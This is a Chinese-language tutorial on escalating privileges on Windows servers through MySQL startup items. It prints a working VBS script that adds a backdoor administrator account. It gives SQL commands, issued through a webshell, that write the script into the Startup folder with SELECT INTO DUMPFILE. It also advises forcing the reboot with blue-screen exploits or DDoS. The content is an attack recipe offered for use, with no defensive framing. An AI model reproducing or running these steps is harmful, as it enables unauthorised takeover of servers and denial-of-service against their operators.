MySQL啟動項提權

標籤：min   提示   mini   nis   使用者   doc   .com   win   exp   

關於MySQL的啟動項提權，聽其名知其意。就是將一段 VBS指令碼匯入到  C:\Documents and Settings\All Users\「開始」菜單\程式\啟動 下，如果管理員重啟了伺服器，那麼就會自動調用該指令碼，並執行其中的使用者添加及提權命令！

這裡有兩種思路：

1. 如果  C:\Documents and Settings\All Users\「開始」菜單\程式\啟動 目錄存在可讀寫的許可權，那麼我們可以直接將 VBS 提權指令碼上傳到該目錄下！

VBS 提權指令碼代碼如下：

setwsnetwork=CreateObject(“WSCRIPT.NETWORK”)
os=”WinNT://”&wsnetwork.ComputerName
Set ob=GetObject(os)
Setoe=GetObject(os&”/Administrators,group”)
Set od=ob.Create(“user”,”secist”)
od.SetPassword “secist.com”
od.SetInfo
Set of=GetObject(os&“/secist”,user)
oe.add os&“/secist”

將以上代碼儲存為 .vbs 尾碼的檔案上傳即可！

2. 通過大馬的MySQL執行功能，利用SQL命令來進行VBS指令碼的建立及添加。

create table secist(cmd text);

insert into secist values(“set wshshell=createobject(“”wscript.shell””)”);

insert into secist values(“a=wshshell.run(“”cmd.exe /c net user secist secist.com /add“”,0)”);

insert into secist values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators secist /add“”,0)”);

select * from secist into dumpfile “C:\Documents and Settings\All Users\「開始」菜單\程式\啟動\secist.vbs”;

成功執行以上命令後，只要管理員重啟了伺服器，我們就可以成功提權了！

溫馨提示：

1.關於重啟目標伺服器，我們可以利用一些可導致伺服器藍屏的EXP，或者DDoS拒絕服務！

2.上傳的目錄必須具備可讀寫的許可權！

3.調用的 cmd 也必須有足夠的許可權！

MySQL啟動項提權